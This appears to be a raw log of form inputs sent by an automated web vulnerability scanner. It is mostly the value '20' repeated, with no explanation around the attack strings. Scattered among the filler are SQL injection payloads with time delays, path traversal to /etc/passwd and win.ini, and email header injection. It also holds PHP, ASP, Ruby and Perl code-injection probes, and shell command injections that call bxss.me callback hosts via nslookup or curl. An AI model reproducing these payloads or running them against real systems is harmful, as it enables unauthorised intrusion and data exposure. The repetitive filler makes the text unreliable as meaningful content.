20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
1DLcy5MQ44O
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
p3RtZ5JH
20
20
20
20
20
20&n981419=v982403
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20%0abcc:074625.142431-31656.142431.a5501.19585.2@bxss.me
20
20
20
20
20
20
to@example.com>%0d%0abcc:074625.142431-31657.142431.a5501.19585.2@bxss.me
20
20
20
20
20
20
20
20
20
20
20
20
20
20
${9999762+10000175}
20
20
20
20
20
20
20
20
20
20
20
20
20
response.write(9401201*9750124)
20
20
20
20
20
20
)
20
20
20
20
'+response.write(9401201*9750124)+'
20
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
20
20
20
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
!(()&&!|*|*|
20
20
"+response.write(9401201*9750124)+"
20
20
20
20
20
20
20
^(#$!@#$)(()))******
20
xfs.bxss.me
20
20
20
20
20
20
20
20
HttP://bxss.me/t/xss.html?%00
20
20
20
20
20
20
20
20
20
bxss.me/t/xss.html?%00
20
"+"A".concat(70-3).concat(22*4).concat(101).concat(86).concat(98).concat(90)+(require"socket"
Socket.gethostbyname("hitec"+"ksjgwidh8bab2.bxss.me.")[3].to_s)+"
20
20
20
20
20
20
20
'+'A'.concat(70-3).concat(22*4).concat(105).concat(77).concat(114).concat(70)+(require'socket'
Socket.gethostbyname('hitfi'+'ynfxywiye09ab.bxss.me.')[3].to_s)+'
20
20
20
20
20
20
20
20
../../../../../../../../../../../../../../etc/passwd
'"()
20
20
'"
20
20
20
../../../../../../../../../../../../../../windows/win.ini
20'&&sleep(27*1000)*sbbpee&&'
20
20
20
20"&&sleep(27*1000)*zfpitr&&"
file:///etc/passwd
'.gethostbyname(lc('hitkc'.'idmttwrsabd14.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(69).chr(116).chr(72).'
20
20
20'||sleep(27*1000)*lgipcn||'
20
20
20
20
20"||sleep(27*1000)*heqwgy||"
20
".gethostbyname(lc("hitml"."ucbpebjg0ac86.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(81).chr(98).chr(65)."
20
20
20
../20
20
20
20
20
20
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
20
20
20
';print(md5(31337));$a='
20
20
20
";print(md5(31337));$a="
20
20
20
20
${@print(md5(31337))}
${@print(md5(31337))}\
20
20
20
'.print(md5(31337)).'
20
20
20
20
20
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
20
20
20
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
20
20
Http://bxss.me/t/fit.txt
20
20
http://bxss.me/t/fit.txt%3F.jpg
20
/etc/shells
20
c:/windows/win.ini
echo bxsxxg$()\ ycnrzl\nz^xyu||a #' &echo bxsxxg$()\ ycnrzl\nz^xyu||a #|" &echo bxsxxg$()\ ycnrzl\nz^xyu||a #
bxss.me
&echo btpebc$()\ wgbdus\nz^xyu||a #' &echo btpebc$()\ wgbdus\nz^xyu||a #|" &echo btpebc$()\ wgbdus\nz^xyu||a #
20
20
|echo ucdlsj$()\ hltonv\nz^xyu||a #' |echo ucdlsj$()\ hltonv\nz^xyu||a #|" |echo ucdlsj$()\ hltonv\nz^xyu||a #
(nslookup -q=cname hitslfxlxjykgc7180.bxss.me||curl hitslfxlxjykgc7180.bxss.me))
$(nslookup -q=cname hitehuvtkftoa2eac5.bxss.me||curl hitehuvtkftoa2eac5.bxss.me)
20
&nslookup -q=cname hitochfiryftv5e8cf.bxss.me&'\"`0&nslookup -q=cname hitochfiryftv5e8cf.bxss.me&`'
20
20
20
&(nslookup -q=cname hitkrtjkqvzle25f1f.bxss.me||curl hitkrtjkqvzle25f1f.bxss.me)&'\"`0&(nslookup -q=cname hitkrtjkqvzle25f1f.bxss.me||curl hitkrtjkqvzle25f1f.bxss.me)&`'
20
|(nslookup -q=cname hitdtlvkguuby7964e.bxss.me||curl hitdtlvkguuby7964e.bxss.me)
20
20
`(nslookup -q=cname hitsxapwowrqofecfe.bxss.me||curl hitsxapwowrqofecfe.bxss.me)`
20
;(nslookup -q=cname hitzcoraoqodp556ed.bxss.me||curl hitzcoraoqodp556ed.bxss.me)|(nslookup -q=cname hitzcoraoqodp556ed.bxss.me||curl hitzcoraoqodp556ed.bxss.me)&(nslookup -q=cname hitzcoraoqodp556ed.bxss.me||curl hitzcoraoqodp556ed.bxss.me)
20
20'"()&%fyc9(9852)
20
'"()&%fyc9(9185)
20
20
209009881
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
RYdazFUc
-1 OR 2+630-630-1=0+0+0+1 --
-1 OR 2+735-735-1=0+0+0+1
-1' OR 2+135-135-1=0+0+0+1 --
-1' OR 2+821-821-1=0+0+0+1 or 'jlRnZPBJ'='
-1" OR 2+957-957-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
BQLtanQu'; waitfor delay '0:0:15' --
-5 OR 729=(SELECT 729 FROM PG_SLEEP(15))--
-5) OR 425=(SELECT 425 FROM PG_SLEEP(15))--
-1)) OR 199=(SELECT 199 FROM PG_SLEEP(15))--
ebtsD39c' OR 720=(SELECT 720 FROM PG_SLEEP(15))--
RiXx2eFg') OR 713=(SELECT 713 FROM PG_SLEEP(15))--
u35ZaRwk')) OR 817=(SELECT 817 FROM PG_SLEEP(15))--
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1????%2527%2522
@@M8Rd3
20
20
20
20